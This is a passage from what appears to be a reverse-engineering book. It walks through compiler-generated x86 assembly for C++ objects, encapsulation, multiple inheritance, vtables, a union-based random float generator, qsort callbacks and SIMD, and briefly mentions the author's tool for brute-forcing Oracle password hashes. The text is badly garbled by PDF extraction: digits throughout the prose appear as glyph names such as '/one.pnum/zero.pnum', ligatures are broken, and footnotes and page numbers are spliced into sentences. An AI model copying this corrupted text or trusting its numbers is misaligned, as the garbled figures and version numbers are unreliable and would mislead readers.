?dump@sphere@@QAEXXZ PROC ; sphere::dump, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx+4]
mov ecx, DWORD PTR [ecx]
push eax
push ecx
; ’this is sphere. color=%d, radius=%d’, 0aH, 00H
push OFFSET ??_C@_0CF@EFEDJLDC@this?5is?5sphere?4?5color?$DN?$CFd?0?5radius@
call _printf
add esp, 12 ; 0000000cH
ret 0
?dump@sphere@@QAEXXZ ENDP ; sphere::dump
So, here is memory layout:
(base class object )
offset description
+/zero.pnumx/zero.pnum int color
(inherited classes)
box:
/one.pnum/zero.pnum/one.pnum/Ob0 options mean inline expansion disabling, because, function inlining right into the code where the function is called will make our
experiment harder
/one.pnum/two.pnum/zero.pnum
offset description
+/zero.pnumx/zero.pnum int color
+/zero.pnumx/four.pnum int width
+/zero.pnumx/eight.pnum int height
+/zero.pnumxC int depth
sphere :
offset description
+/zero.pnumx/zero.pnum int color
+/zero.pnumx/four.pnum int radius
Let’s seemain() function body:
Listing /one.pnum./one.pnum/zero.pnum/one.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
PUBLIC _main
_TEXT SEGMENT
_s$ = -24 ; size = 8
_b$ = -16 ; size = 16
_main PROC
sub esp, 24 ; 00000018H
push 30 ; 0000001eH
push 20 ; 00000014H
push 10 ; 0000000aH
push 1
lea ecx, DWORD PTR _b$[esp+40]
call ??0box@@QAE@HHHH@Z ; box::box
push 40 ; 00000028H
push 2
lea ecx, DWORD PTR _s$[esp+32]
call ??0sphere@@QAE@HH@Z ; sphere::sphere
lea ecx, DWORD PTR _b$[esp+24]
call ?print_color@object@@QAEXXZ ; object::print_color
lea ecx, DWORD PTR _s$[esp+24]
call ?print_color@object@@QAEXXZ ; object::print_color
lea ecx, DWORD PTR _b$[esp+24]
call ?dump@box@@QAEXXZ ; box::dump
lea ecx, DWORD PTR _s$[esp+24]
call ?dump@sphere@@QAEXXZ ; sphere::dump
xor eax, eax
add esp, 24 ; 00000018H
ret 0
_main ENDP
Inherited classes should always add their fields a/f_ter base classes’ fields, so to make possible for base class
methods to work with their fields.
Whenobject::print_color() method is called, a pointers to both boxobject and sphere object are passed
asthis , it can work with these objects easily because color field in these objects is always at the pinned address
(at+/zero.pnumx/zero.pnum offset).
It can be said, object::print_color() method is agnostic in relation to input object type as long as fields
will be pinned at the same addresses, and this condition is always true.
And if you create inherited class of boxclass, for example, compiler will add new fields a/f_ter depth field, leaving
boxclass fields at the pinned addresses.
Thus,box::dump() method will work fine accessing color /width /height /depths fields always pinned on known
addresses.
GCC-generated code is almost the same, with the sole exception of this pointer passing (as it was described
above, it passing as first argument instead of ECXregisters.
/one.pnum/two.pnum/one.pnum
/one.pnum./one.pnum/seven.pnum./three.pnum Encapsulation in C++
Encapsulation is data hiding in private sections of class, for example, to allow access to them only from this class
methods, but no more than.
However, are there any marks in code about the fact that some field is private and some other — not?
No, there are no such marks.
Let’s try simple example:
#include <stdio.h>
class box
{
private:
int color, width, height, depth;
public:
box(int color, int width, int height, int depth)
{
this->color=color;
this->width=width;
this->height=height;
this->depth=depth;
};
void dump()
{
printf ("this is box. color=%d, width=%d, height=%d, depth=%d\n", color, width, height, depth);
};
};
Let’s compile it again in MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum with /Oxand/Ob0 options and let’s see box::dump() method code:
?dump@box@@QAEXXZ PROC ; box::dump, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx+12]
mov edx, DWORD PTR [ecx+8]
push eax
mov eax, DWORD PTR [ecx+4]
mov ecx, DWORD PTR [ecx]
push edx
push eax
push ecx
; ’this is box. color=%d, width=%d, height=%d, depth=%d’, 0aH, 00H
push OFFSET ??_C@_0DG@NCNGAADL@this?5is?5box?4?5color?$DN?$CFd?0?5width?$DN?$CFd?0@
call _printf
add esp, 20 ; 00000014H
ret 0
?dump@box@@QAEXXZ ENDP ; box::dump
Here is a memory layout of the class:
offset description
+/zero.pnumx/zero.pnum int color
+/zero.pnumx/four.pnum int width
+/zero.pnumx/eight.pnum int height
+/zero.pnumxC int depth
All fields are private and not allowed to access from any other functions, but, knowing this layout, can we
create a code modifying these fields?
So I added hack_oop_encapsulation() function, which, if has the body as follows, won’t compile:
void hack_oop_encapsulation(class box * o)
{
o->width=1; // that code can’t be compiled: "error C2248: ’box::width’ : cannot access private member
declared in class ’box’"
};
/one.pnum/two.pnum/two.pnum
Nevertheless, if to cast boxtype to pointer to int array , and if to modify array of int-s we got, then we have
success.
void hack_oop_encapsulation(class box * o)
{
unsigned int *ptr_to_object=reinterpret_cast<unsigned int*>(o);
ptr_to_object[1]=123;
};
This functions’ code is very simple — it can be said, the function taking pointer to array of int-s on input and
writing /one.pnum/two.pnum/three.pnumto the second int:
?hack_oop_encapsulation@@YAXPAVbox@@@Z PROC ; hack_oop_encapsulation
mov eax, DWORD PTR _o$[esp-4]
mov DWORD PTR [eax+4], 123 ; 0000007bH
ret 0
?hack_oop_encapsulation@@YAXPAVbox@@@Z ENDP ; hack_oop_encapsulation
Let’s check, how it works:
int main()
{
box b(1, 10, 20, 30);
b.dump();
hack_oop_encapsulation(&b);
b.dump();
return 0;
};
Let’s run:
this is box. color=1, width=10, height=20, depth=30
this is box. color=1, width=123, height=20, depth=30
We see, encapsulation is just class fields protection only on compiling stage. C++ compiler won’t allow to
generate a code modifying protected fields straightforwardly, nevertheless, it’s possible using dirty hacks .
/one.pnum/two.pnum/three.pnum
/one.pnum./one.pnum/seven.pnum./four.pnum Multiple inheritance in C++
Multiple inheritance is a class creation which inherits fields and methods from two or more classes.
Let’s write simple example again:
#include <stdio.h>
class box
{
public:
int width, height, depth;
box() { };
box(int width, int height, int depth)
{
this->width=width;
this->height=height;
this->depth=depth;
};
void dump()
{
printf ("this is box. width=%d, height=%d, depth=%d\n", width, height, depth);
};
int get_volume()
{
return width * height * depth;
};
};
class solid_object
{
public:
int density;
solid_object() { };
solid_object(int density)
{
this->density=density;
};
int get_density()
{
return density;
};
void dump()
{
printf ("this is solid_object. density=%d\n", density);
};
};
class solid_box: box, solid_object
{
public:
solid_box (int width, int height, int depth, int density)
{
this->width=width;
this->height=height;
this->depth=depth;
this->density=density;
};
void dump()
{
printf ("this is solid_box. width=%d, height=%d, depth=%d, density=%d\n", width, height, depth,
density);
};
int get_weight() { return get_volume() * get_density(); };
};
int main()
/one.pnum/two.pnum/four.pnum
{
box b(10, 20, 30);
solid_object so(100);
solid_box sb(10, 20, 30, 3);
b.dump();
so.dump();
sb.dump();
printf ("%d\n", sb.get_weight());
return 0;
};
Let’s compile it in MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum with /Oxand/Ob0 options and let’s see box::dump() ,solid_object::dump()
andsolid_box::dump() methods code:
Listing /one.pnum./one.pnum/zero.pnum/two.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
?dump@box@@QAEXXZ PROC ; box::dump, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx+8]
mov edx, DWORD PTR [ecx+4]
push eax
mov eax, DWORD PTR [ecx]
push edx
push eax
; ’this is box. width=%d, height=%d, depth=%d’, 0aH, 00H
push OFFSET ??_C@_0CM@DIKPHDFI@this?5is?5box?4?5width?$DN?$CFd?0?5height?$DN?$CFd@
call _printf
add esp, 16 ; 00000010H
ret 0
?dump@box@@QAEXXZ ENDP ; box::dump
Listing /one.pnum./one.pnum/zero.pnum/three.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
?dump@solid_object@@QAEXXZ PROC ; solid_object::dump, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx]
push eax
; ’this is solid_object. density=%d’, 0aH
push OFFSET ??_C@_0CC@KICFJINL@this?5is?5solid_object?4?5density?$DN?$CFd@
call _printf
add esp, 8
ret 0
?dump@solid_object@@QAEXXZ ENDP ; solid_object::dump
Listing /one.pnum./one.pnum/zero.pnum/four.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
?dump@solid_box@@QAEXXZ PROC ; solid_box::dump, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx+12]
mov edx, DWORD PTR [ecx+8]
push eax
mov eax, DWORD PTR [ecx+4]
mov ecx, DWORD PTR [ecx]
push edx
push eax
push ecx
; ’this is solid_box. width=%d, height=%d, depth=%d, density=%d’, 0aH
push OFFSET ??_C@_0DO@HNCNIHNN@this?5is?5solid_box?4?5width?$DN?$CFd?0?5hei@
call _printf
add esp, 20 ; 00000014H
ret 0
?dump@solid_box@@QAEXXZ ENDP ; solid_box::dump
So, the memory layout for all three classes is:
boxclass:
/one.pnum/two.pnum/five.pnum
offset description
+/zero.pnumx/zero.pnum width
+/zero.pnumx/four.pnum height
+/zero.pnumx/eight.pnum depth
solid_object class:
offset description
+/zero.pnumx/zero.pnum density
It can be said, solid_box class memory layout will be united :
solid_box class:
offset description
+/zero.pnumx/zero.pnum width
+/zero.pnumx/four.pnum height
+/zero.pnumx/eight.pnum depth
+/zero.pnumxC density
The code of box::get_volume() andsolid_object::get_density() methods is trivial:
Listing /one.pnum./one.pnum/zero.pnum/five.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
?get_volume@box@@QAEHXZ PROC ; box::get_volume, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx+8]
imul eax, DWORD PTR [ecx+4]
imul eax, DWORD PTR [ecx]
ret 0
?get_volume@box@@QAEHXZ ENDP ; box::get_volume
Listing /one.pnum./one.pnum/zero.pnum/six.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
?get_density@solid_object@@QAEHXZ PROC ; solid_object::get_density, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx]
ret 0
?get_density@solid_object@@QAEHXZ ENDP ; solid_object::get_density
But the code of solid_box::get_weight() method is much more interesting:
Listing /one.pnum./one.pnum/zero.pnum/seven.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
?get_weight@solid_box@@QAEHXZ PROC ; solid_box::get_weight, COMDAT
; _this$ = ecx
push esi
mov esi, ecx
push edi
lea ecx, DWORD PTR [esi+12]
call ?get_density@solid_object@@QAEHXZ ; solid_object::get_density
mov ecx, esi
mov edi, eax
call ?get_volume@box@@QAEHXZ ; box::get_volume
imul eax, edi
pop edi
pop esi
ret 0
?get_weight@solid_box@@QAEHXZ ENDP ; solid_box::get_weight
get_weight() just calling two methods, but for get_volume() it just passing pointer to this , and forget_density()
it passing pointer to this shi/f_ted by /one.pnum/two.pnum(or/zero.pnumxC) bytes, and there, in solid_box class memory layout, fields of
solid_object class are beginning.
Thus,solid_object::get_density() method will believe it is working with usual solid_object class, and
box::get_volume() method will work with its three fields, believing this is usual object of boxclass.
/one.pnum/two.pnum/six.pnum
Thus, we can say, an object of some class, inheriting from several classes, representing in memory united class,
containing all inherited fields. And each inherited method called with a pointer to corresponding structure’s part
passed.
/one.pnum/two.pnum/seven.pnum
/one.pnum./one.pnum/seven.pnum./five.pnum C++ virtual methods
Yet another simple example:
#include <stdio.h>
class object
{
public:
int color;
object() { };
object (int color) { this->color=color; };
virtual void dump()
{
printf ("color=%d\n", color);
};
};
class box : public object
{
private:
int width, height, depth;
public:
box(int color, int width, int height, int depth)
{
this->color=color;
this->width=width;
this->height=height;
this->depth=depth;
};
void dump()
{
printf ("this is box. color=%d, width=%d, height=%d, depth=%d\n", color, width, height, depth);
};
};
class sphere : public object
{
private:
int radius;
public:
sphere(int color, int radius)
{
this->color=color;
this->radius=radius;
};
void dump()
{
printf ("this is sphere. color=%d, radius=%d\n", color, radius);
};
};
int main()
{
box b(1, 10, 20, 30);
sphere s(2, 40);
object *o1=&b;
object *o2=&s;
o1->dump();
o2->dump();
return 0;
};
Class object has virtual method dump() , being replaced in boxand sphere class-inheritors.
/one.pnum/two.pnum/eight.pnum
If in some environment, where it’s not known what type has object, as in main() function in example, a virtual
methoddump() is called, somewhere, the information about its type should be stored, so to call relevant virtual
method.
Let’s compile it in MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum with /Oxand/Ob0 options and let’s see main() function code:
_s$ = -32 ; size = 12
_b$ = -20 ; size = 20
_main PROC
sub esp, 32 ; 00000020H
push 30 ; 0000001eH
push 20 ; 00000014H
push 10 ; 0000000aH
push 1
lea ecx, DWORD PTR _b$[esp+48]
call ??0box@@QAE@HHHH@Z ; box::box
push 40 ; 00000028H
push 2
lea ecx, DWORD PTR _s$[esp+40]
call ??0sphere@@QAE@HH@Z ; sphere::sphere
mov eax, DWORD PTR _b$[esp+32]
mov edx, DWORD PTR [eax]
lea ecx, DWORD PTR _b$[esp+32]
call edx
mov eax, DWORD PTR _s$[esp+32]
mov edx, DWORD PTR [eax]
lea ecx, DWORD PTR _s$[esp+32]
call edx
xor eax, eax
add esp, 32 ; 00000020H
ret 0
_main ENDP
Pointer to dump() function is taken somewhere from object. Where the address of new method would be writ-
ten there? Only somewhere in constructors: there are no other place, because, nothing more is called in main()
function./one.pnum/zero.pnum/two.pnum
Let’s see boxclass constructor’s code:
??_R0?AVbox@@@8 DD FLAT:??_7type_info@@6B@ ; box ‘RTTI Type Descriptor’
DD 00H
DB ’.?AVbox@@’, 00H
??_R1A@?0A@EA@box@@8 DD FLAT:??_R0?AVbox@@@8 ; box::‘RTTI Base Class Descriptor at (0,-1,0,64)’
DD 01H
DD 00H
DD 0ffffffffH
DD 00H
DD 040H
DD FLAT:??_R3box@@8
??_R2box@@8 DD FLAT:??_R1A@?0A@EA@box@@8 ; box::‘RTTI Base Class Array’
DD FLAT:??_R1A@?0A@EA@object@@8
??_R3box@@8 DD 00H ; box::‘RTTI Class Hierarchy Descriptor’
DD 00H
DD 02H
DD FLAT:??_R2box@@8
??_R4box@@6B@ DD 00H ; box::‘RTTI Complete Object Locator’
DD 00H
DD 00H
DD FLAT:??_R0?AVbox@@@8
DD FLAT:??_R3box@@8
??_7box@@6B@ DD FLAT:??_R4box@@6B@ ; box::‘vftable’
/one.pnum/zero.pnum/two.pnumAbout pointers to functions, read more in relevant section:/one.pnum./one.pnum/nine.pnum
/one.pnum/two.pnum/nine.pnum
DD FLAT:?dump@box@@UAEXXZ
_color$ = 8 ; size = 4
_width$ = 12 ; size = 4
_height$ = 16 ; size = 4
_depth$ = 20 ; size = 4
??0box@@QAE@HHHH@Z PROC ; box::box, COMDAT
; _this$ = ecx
push esi
mov esi, ecx
call ??0object@@QAE@XZ ; object::object
mov eax, DWORD PTR _color$[esp]
mov ecx, DWORD PTR _width$[esp]
mov edx, DWORD PTR _height$[esp]
mov DWORD PTR [esi+4], eax
mov eax, DWORD PTR _depth$[esp]
mov DWORD PTR [esi+16], eax
mov DWORD PTR [esi], OFFSET ??_7box@@6B@
mov DWORD PTR [esi+8], ecx
mov DWORD PTR [esi+12], edx
mov eax, esi
pop esi
ret 16 ; 00000010H
??0box@@QAE@HHHH@Z ENDP ; box::box
Here we see slightly different memory layout: the first field is a pointer to some table box::‘vftable’ (name
was set by MSVC compiler).
In this table we see a link to the table named box::‘RTTI Complete Object Locator’ and also a link to
box::dump() method. So this is named virtual methods table and RTTI/one.pnum/zero.pnum/three.pnum. Table of virtual methods contain ad-
dresses of methods and RTTI table contain information about types. By the way, RTTI-tables are the tables enu-
merated while calling to dynamic_cast and typeid in C++. You can also see here class name as plain text string.
Thus, some method of base object class may call virtual method object::dump() , which in turn, will call a method
of inherited class, because that information is present right in the object’s structure.
Some CPU time needed for enumerating these tables and finding right virtual method address, thus virtual
methods are widely considered as slightly slower than usual methods.
In GCC-generated code RTTI-tables constructed slightly differently.
/one.pnum/zero.pnum/three.pnumRun-time type information
/one.pnum/three.pnum/zero.pnum
/one.pnum./one.pnum/eight.pnum Unions
/one.pnum./one.pnum/eight.pnum./one.pnum Pseudo-random number generator example
If we need float random numbers from /zero.pnum to /one.pnum, the most simplest thing is to use random numbers generator like
Mersenne twister producing random /three.pnum/two.pnum-bit values in DWORD form, transform this value to float and then divide it
byRAND_MAX (/zero.pnumxffffffff in our case) — value we got will be in /zero.pnum../one.pnum interval.
But as we know, division operation is almost always very slow. Will it be possible to get rid of it, as in case of
division by multiplication? /one.pnum./one.pnum/two.pnum
Let’s recall what float number consisted of: sign bit, significand bits and exponent bits. We need just to store
random bits to all significand bits for getting random float number!
Exponent cannot be zero (number will be denormalized in this case), so we will store /zero.pnum/one.pnum/one.pnum/one.pnum/one.pnum/one.pnum/one.pnum/one.pnum to exponent —
this mean exponent will be /one.pnum. Then fill significand with random bits, set sign bit to /zero.pnum (which mean positive number)
and voilà. Generated numbers will be in /one.pnum to /two.pnum interval, so we also should subtract /one.pnum from it.
Very simple linear congruential random numbers generator is used in my example/one.pnum/zero.pnum/four.pnum, producing /three.pnum/two.pnum-bit num-
bers. The PRNG initializing by current time in UNIX-style.
Then, float type represented as union — that is the C/C++ construction allowing us to interpret piece of memory
differently typed. In our case, we are able to create a variable of union type and then access to it as it’s float or as
it’suint/three.pnum/two.pnum_t . It can be said, it’s just a hack. A dirty one.
#include <stdio.h>
#include <stdint.h>
#include <time.h>
union uint32_t_float
{
uint32_t i;
float f;
};
// from the Numerical Recipes book
const uint32_t RNG_a=1664525;
const uint32_t RNG_c=1013904223;
int main()
{
uint32_t_float tmp;
uint32_t RNG_state=time(NULL); // initial seed
for (int i=0; i<100; i++)
{
RNG_state=RNG_state*RNG_a+RNG_c;
tmp.i=RNG_state & 0x007fffff | 0x3F800000;
float x=tmp.f-1;
printf ("%f\n", x);
};
return 0;
};
MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum ( /Ox):
$SG4232 DB ’%f’, 0aH, 00H
__real@3ff0000000000000 DQ 03ff0000000000000r ; 1
tv140 = -4 ; size = 4
_tmp$ = -4 ; size = 4
_main PROC
push ebp
mov ebp, esp
/one.pnum/zero.pnum/four.pnumidea was taken from: http://xor0110.wordpress.com/2010/09/24/how-to-generate-floating-point-random-numbers-efficiently
/one.pnum/three.pnum/one.pnum
and esp, -64 ; ffffffc0H
sub esp, 56 ; 00000038H
push esi
push edi
push 0
call __time64
add esp, 4
mov esi, eax
mov edi, 100 ; 00000064H
$LN3@main:
; let’s generate random 32-bit number
imul esi, 1664525 ; 0019660dH
add esi, 1013904223 ; 3c6ef35fH
mov eax, esi
; leave bits for significand only
and eax, 8388607 ; 007fffffH
; set exponent to 1
or eax, 1065353216 ; 3f800000H
; store this value as int
mov DWORD PTR _tmp$[esp+64], eax
sub esp, 8
; load this value as float
fld DWORD PTR _tmp$[esp+72]
; subtract one from it
fsub QWORD PTR __real@3ff0000000000000
fstp DWORD PTR tv140[esp+72]
fld DWORD PTR tv140[esp+72]
fstp QWORD PTR [esp]
push OFFSET $SG4232
call _printf
add esp, 12 ; 0000000cH
dec edi
jne SHORT $LN3@main
pop edi
xor eax, eax
pop esi
mov esp, ebp
pop ebp
ret 0
_main ENDP
_TEXT ENDS
END
GCC producing very same code.
/one.pnum/three.pnum/two.pnum
/one.pnum./one.pnum/nine.pnum Pointers to functions
Pointer to function, as any other pointer, is just an address of function beginning in its code segment.
It is o/f_ten used in callbacks/one.pnum/zero.pnum/five.pnum.
Well-known examples are:
∙qsort()/one.pnum/zero.pnum/six.pnum,atexit()/one.pnum/zero.pnum/seven.pnumfrom the standard C library;
∙signals in *NIX OS/one.pnum/zero.pnum/eight.pnum;
∙thread starting: CreateThread() (win/three.pnum/two.pnum),pthread_create() (POSIX);
∙a lot of win/three.pnum/two.pnum functions, e.g. EnumChildWindows()/one.pnum/zero.pnum/nine.pnum.
So,qsort() function is a C/C++ standard library quicksort implemenation. The functions is able to sort any-
thing, any types of data, if you have a function for two elements comparison and qsort() is able to call it.
The comparison function can be defined as:
int (*compare)(const void *, const void *)
Let’s use slightly modified example I found here:
/* ex3 Sorting ints with qsort */
#include <stdio.h>
#include <stdlib.h>
int comp(const void * _a, const void * _b)
{
const int *a=(const int *)_a;
const int *b=(const int *)_b;
if (*a==*b)
return 0;
else
if (*a < *b)
return -1;
else
return 1;
}
int main(int argc, char* argv[])
{
int numbers[10]={1892,45,200,-98,4087,5,-12345,1087,88,-100000};
int i;
/* Sort the array */
qsort(numbers,10,sizeof(int),comp) ;
for (i=0;i<9;i++)
printf("Number = %d\n",numbers[ i ]) ;
return 0;
}
Let’s compile it in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum (I omitted some parts for the sake of brefity) with /Oxoption:
Listing /one.pnum./one.pnum/zero.pnum/eight.pnum: Optimizing MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
__a$ = 8 ; size = 4
__b$ = 12 ; size = 4
_comp PROC
/one.pnum/zero.pnum/five.pnumhttp://en.wikipedia.org/wiki/Callback_(computer_science)
/one.pnum/zero.pnum/six.pnumhttp://en.wikipedia.org/wiki/Qsort_(C_standard_library)
/one.pnum/zero.pnum/seven.pnumhttp://www.opengroup.org/onlinepubs/009695399/functions/atexit.html
/one.pnum/zero.pnum/eight.pnumhttp://en.wikipedia.org/wiki/Signal.h
/one.pnum/zero.pnum/nine.pnumhttp://msdn.microsoft.com/en-us/library/ms633494(VS.85).aspx
/one.pnum/three.pnum/three.pnum
mov eax, DWORD PTR __a$[esp-4]
mov ecx, DWORD PTR __b$[esp-4]
mov eax, DWORD PTR [eax]
mov ecx, DWORD PTR [ecx]
cmp eax, ecx
jne SHORT $LN4@comp
xor eax, eax
ret 0
$LN4@comp:
xor edx, edx
cmp eax, ecx
setge dl
lea eax, DWORD PTR [edx+edx-1]
ret 0
_comp ENDP
...
_numbers$ = -44 ; size = 40
_i$ = -4 ; size = 4
_argc$ = 8 ; size = 4
_argv$ = 12 ; size = 4
_main PROC
push ebp
mov ebp, esp
sub esp, 44 ; 0000002cH
mov DWORD PTR _numbers$[ebp], 1892 ; 00000764H
mov DWORD PTR _numbers$[ebp+4], 45 ; 0000002dH
mov DWORD PTR _numbers$[ebp+8], 200 ; 000000c8H
mov DWORD PTR _numbers$[ebp+12], -98 ; ffffff9eH
mov DWORD PTR _numbers$[ebp+16], 4087 ; 00000ff7H
mov DWORD PTR _numbers$[ebp+20], 5
mov DWORD PTR _numbers$[ebp+24], -12345 ; ffffcfc7H
mov DWORD PTR _numbers$[ebp+28], 1087 ; 0000043fH
mov DWORD PTR _numbers$[ebp+32], 88 ; 00000058H
mov DWORD PTR _numbers$[ebp+36], -100000 ; fffe7960H
push OFFSET _comp
push 4
push 10 ; 0000000aH
lea eax, DWORD PTR _numbers$[ebp]
push eax
call _qsort
add esp, 16 ; 00000010H
...
Nothing surprising so far. As a fourth argument, an address of label _comp is passed, that’s just a place where
functioncomp() located.
Howqsort() calling it?
Let’s take a look into this function located in MSVCR/eight.pnum/zero.pnum.DLL (a MSVC DLL module with C standard library func-
tions):
Listing /one.pnum./one.pnum/zero.pnum/nine.pnum: MSVCR/eight.pnum/zero.pnum.DLL
.text:7816CBF0 ; void __cdecl qsort(void *, unsigned int, unsigned int, int (__cdecl *)(const void *, const
void *))
.text:7816CBF0 public _qsort
.text:7816CBF0 _qsort proc near
.text:7816CBF0
.text:7816CBF0 lo = dword ptr -104h
.text:7816CBF0 hi = dword ptr -100h
.text:7816CBF0 var_FC = dword ptr -0FCh
.text:7816CBF0 stkptr = dword ptr -0F8h
.text:7816CBF0 lostk = dword ptr -0F4h
.text:7816CBF0 histk = dword ptr -7Ch
.text:7816CBF0 base = dword ptr 4
/one.pnum/three.pnum/four.pnum
.text:7816CBF0 num = dword ptr 8
.text:7816CBF0 width = dword ptr 0Ch
.text:7816CBF0 comp = dword ptr 10h
.text:7816CBF0
.text:7816CBF0 sub esp, 100h
....
.text:7816CCE0 loc_7816CCE0: ; CODE XREF: _qsort+B1
.text:7816CCE0 shr eax, 1
.text:7816CCE2 imul eax, ebp
.text:7816CCE5 add eax, ebx
.text:7816CCE7 mov edi, eax
.text:7816CCE9 push edi
.text:7816CCEA push ebx
.text:7816CCEB call [esp+118h+comp]
.text:7816CCF2 add esp, 8
.text:7816CCF5 test eax, eax
.text:7816CCF7 jle short loc_7816CD04
comp — is fourth function argument. Here the control is just passed to the address in comp . Before it, two
arguments prepared for comp() . Its result is checked a/f_ter its execution.
That’s why it’s dangerous to use pointers to functions. First of all, if you call qsort() with incorrect pointer to
function, qsort() may pass control to incorrect place, process may crash and this bug will be hard to find.
Second reason is that callback function types should comply strictly, calling wrong function with wrong argu-
ments of wrong types may lead to serious problems, however, process crashing is not a big problem — big problem
is to determine a reason of crashing — because compiler may be silent about potential trouble while compiling.
/one.pnum./one.pnum/nine.pnum./one.pnum GCC
Not a big difference:
Listing /one.pnum./one.pnum/one.pnum/zero.pnum: GCC
lea eax, [esp+40h+var_28]
mov [esp+40h+var_40], eax
mov [esp+40h+var_28], 764h
mov [esp+40h+var_24], 2Dh
mov [esp+40h+var_20], 0C8h
mov [esp+40h+var_1C], 0FFFFFF9Eh
mov [esp+40h+var_18], 0FF7h
mov [esp+40h+var_14], 5
mov [esp+40h+var_10], 0FFFFCFC7h
mov [esp+40h+var_C], 43Fh
mov [esp+40h+var_8], 58h
mov [esp+40h+var_4], 0FFFE7960h
mov [esp+40h+var_34], offset comp
mov [esp+40h+var_38], 4
mov [esp+40h+var_3C], 0Ah
call _qsort
comp() function:
public comp
comp proc near
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov edx, [eax]
xor eax, eax
/one.pnum/three.pnum/five.pnum
cmp [ecx], edx
jnz short loc_8048458
pop ebp
retn
loc_8048458:
setnl al
movzx eax, al
lea eax, [eax+eax-1]
pop ebp
retn
comp endp
qsort() implementation is located in libc.so.6 and it is in fact just a wrapper for qsort_r() .
It will call then quicksort() , where our defined function will be called via passed pointer:
Listing /one.pnum./one.pnum/one.pnum/one.pnum: (File libc.so./six.pnum, glibc version — /two.pnum./one.pnum/zero.pnum./one.pnum)
.text:0002DDF6 mov edx, [ebp+arg_10]
.text:0002DDF9 mov [esp+4], esi
.text:0002DDFD mov [esp], edi
.text:0002DE00 mov [esp+8], edx
.text:0002DE04 call [ebp+arg_C]
...
/one.pnum/three.pnum/six.pnum
/one.pnum./two.pnum/zero.pnum SIMD
SIMD is just acronym: Single Instruction, Multiple Data .
As it’s said, it’s multiple data processing using only one instruction.
Just as FPU, that CPU subsystem looks like separate processor inside x/eight.pnum/six.pnum.
SIMD began as MMX in x/eight.pnum/six.pnum. /eight.pnum new /six.pnum/four.pnum-bit registers appeared: MM/zero.pnum-MM/seven.pnum.
Each MMX register may hold /two.pnum /three.pnum/two.pnum-bit values, /four.pnum /one.pnum/six.pnum-bit values or /eight.pnum bytes. For example, it is possible to add /eight.pnum /eight.pnum-bit
values (bytes) simultaneously by adding two values in MMX-registers.
One simple example is graphics editor, representing image as a two dimensional array. When user change
image brightness, the editor should add some coefficient to each pixel value, or to subtract. For the sake of brevity,
our image may be grayscale and each pixel defined by one /eight.pnum-bit byte, then it’s possible to change brightness of /eight.pnum
pixels simultaneously.
When MMX appeared, these registers was actually located in FPU registers. It was possible to use either FPU
or MMX at the same time. One might think, Intel saved on transistors, but in fact, the reason of such symbiosis is
simpler — older operation system may not aware of additional CPU registers wouldn’t save them at the context
switching, but will save FPU registers. Thus, MMX-enabled CPU + old operation system + process using MMX = that
all will work together.
SSE — is extension of SIMD registers up to /one.pnum/two.pnum/eight.pnum bits, now separately from FPU.
AVX — another extension to /two.pnum/five.pnum/six.pnum bits.
Now about practical usage.
Of course, memory copying ( memcpy ), memory comparing ( memcmp ) and so on.
One more example: we got DES encryption algorithm, it takes /six.pnum/four.pnum-bit block, /five.pnum/six.pnum-bit key, encrypt block and pro-
duce /six.pnum/four.pnum-bit result. DES algorithm may be considered as a very large electronic circuit, with wires and AND/OR/NOT
gates.
Bitslice DES/one.pnum/one.pnum/zero.pnum— is an idea of processing group of blocks and keys simultaneously. Let’s say, variable of type
unsigned int on x/eight.pnum/six.pnum may hold up to /three.pnum/two.pnum bits, so, it’s possible to store there intermediate results for /three.pnum/two.pnum blocks-keys
pairs simultaneously, using /six.pnum/four.pnum+/five.pnum/six.pnum variables of unsigned int type.
I wrote an utility to brute-force Oracle RDBMS passwords/hashes (ones based on DES), slightly modified bitslice
DES algorithm for SSE/two.pnum and AVX — now it’s possible to encrypt /one.pnum/two.pnum/eight.pnum or /two.pnum/five.pnum/six.pnum block-keys pairs simultaneously.
http://conus.info/utils/ops_SIMD/
/one.pnum./two.pnum/zero.pnum./one.pnum Vectorization
Vectorization/one.pnum/one.pnum/one.pnum, for example, is when you have a loop taking couple of arrays at input and producing one array.
Loop body takes values from input arrays, do something and put result into output array. It’s important that there
is only one single operation applied to each element. Vectorization — is to process several elements simultane-
ously.
For example:
for (i = 0; i < 1024; i++)
{
C[i] = A[i]*B[i];
}
This fragment of code takes elements from A and B, multiplies them and save result into C.
If each array element we have is /three.pnum/two.pnum-bit int, then it’s possible to load /four.pnum elements from A into /one.pnum/two.pnum/eight.pnum-bit XMM-register,
from B to another XMM-registers, and by executing PMULLD (Multiply Packed Signed Dword Integers and Store Low
Result )andPMULHW (Multiply Packed Signed Integers and Store High Result ), it’s possible to get /four.pnum /six.pnum/four.pnum-bit products/one.pnum/one.pnum/two.pnum
at once.
Thus, loop body count is 1024/4instead of /one.pnum/zero.pnum/two.pnum/four.pnum, that’s /four.pnum times less and, of course, faster.
Some compilers can do vectorization automatically in some simple cases, e.g., Intel C++/one.pnum/one.pnum/three.pnum.
I wrote tiny function:
/one.pnum/one.pnum/zero.pnumhttp://www.darkside.com.au/bitslice/
